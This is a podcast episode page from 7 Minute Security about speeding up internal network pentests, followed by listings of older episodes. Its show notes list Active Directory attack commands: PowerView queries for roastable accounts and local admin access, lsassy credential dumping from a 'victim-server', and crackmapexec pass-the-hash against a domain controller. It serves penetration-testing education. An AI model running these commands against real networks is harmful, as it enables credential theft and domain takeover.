7MS #457: Tales of Internal Network Pentest Pwnage - Part 25
7 Minute Security4 Mars 2021

7MS #457: Tales of Internal Network Pentest Pwnage - Part 25

Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence:

  • Get a cmd.exe spun up in the context of your AD user account:
runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe"

Then get some important info in PowerView:

  • Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!

  • Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!

  • Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!

Once you know where you have local admin access, lsassy is your friend:

  • lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server

Did you get an admin's NTLM hash from this dump? Then do this:

  • crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED

(Pwn3d!) FTW!

Avsnitt(719)

7MS #334: IT Security Horrors That Keep You Up at Night

7MS #334: IT Security Horrors That Keep You Up at Night

This week I got to celebrate Halloween with my friends at Netwrix by co-hosting a Webinar called IT Security Horrors That Keep You Up at Night. The content was a modified version of the Blue Team on a...

1 Nov 201823min

7MS #333: Pentesting Potatoes

7MS #333: Pentesting Potatoes

This week I was in lovely Boise, Idaho doing some security assessment work. While I was there I got to hang out with Paul Wilch and some of the Project7 crew and picked up a lot of cool tools and tips...

26 Okt 201813min

7MS #332: Low Hanging Hacker Fruit

7MS #332: Low Hanging Hacker Fruit

In this episode I'm releasing a new document aimed to help organizations eliminate low hanging hacker fruit from the environment. The document contains (relatively) cheap and (relatively) easy things ...

17 Okt 20188min

7MS #331: How to Become a Packtpub Author - Part 3

7MS #331: How to Become a Packtpub Author - Part 3

It's done! It's done!! It's DONE!!! That's right mom, my PacktPub course called Mastering Kali Linux Network Scanning is done! In today's episode I: Recap the course authoring experience Explain m...

10 Okt 20187min

7MS #330: Interview with Nathan Hunstad of Code42

7MS #330: Interview with Nathan Hunstad of Code42

In today's episode, I'm excited to be joined in the studio by Nathan Hunstad, Director of Security at Code42. Nathan and I had a great chat about Code42's new security offering called Code42 Forensic ...

3 Okt 201852min

7MS #329: Active Directory Security 101

7MS #329: Active Directory Security 101

Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what's happening both on your local network and cloud-based IT systems and tell...

27 Sep 201821min

7MS #328: How to Succeed in Business Without Really Crying - Part 5

7MS #328: How to Succeed in Business Without Really Crying - Part 5

This episode is a cavalcade of fun! Why? First, I've got a big announcement: I've accepted a new position. "What?!" exclaimed my mom. "I thought you were president of 7MS, what the what?" No worries, ...

19 Sep 201828min

7MS #327: Interview with John Strand

7MS #327: Interview with John Strand

Today's episode is brought to you by my friends at Netwrix. Their amazing Netwrix Auditor tool gives you visibility into what's happening both on your local network and cloud-based IT systems and tell...

13 Sep 201846min

Populärt inom Politik & nyheter

aftonbladet-krim
rss-krimstad
svenska-fall
p3-krim
spar
aftonbladet-daily
flashback-forever
politiken
rss-sanning-konsekvens
rss-krimreportrarna
motiv
rss-vad-fan-hande
blenda-2
rss-flodet
rss-frandfors-horna
rss-expressen-dok
grans
rss-aftonbladet-krim
svd-ledarredaktionen
ett-rent-noje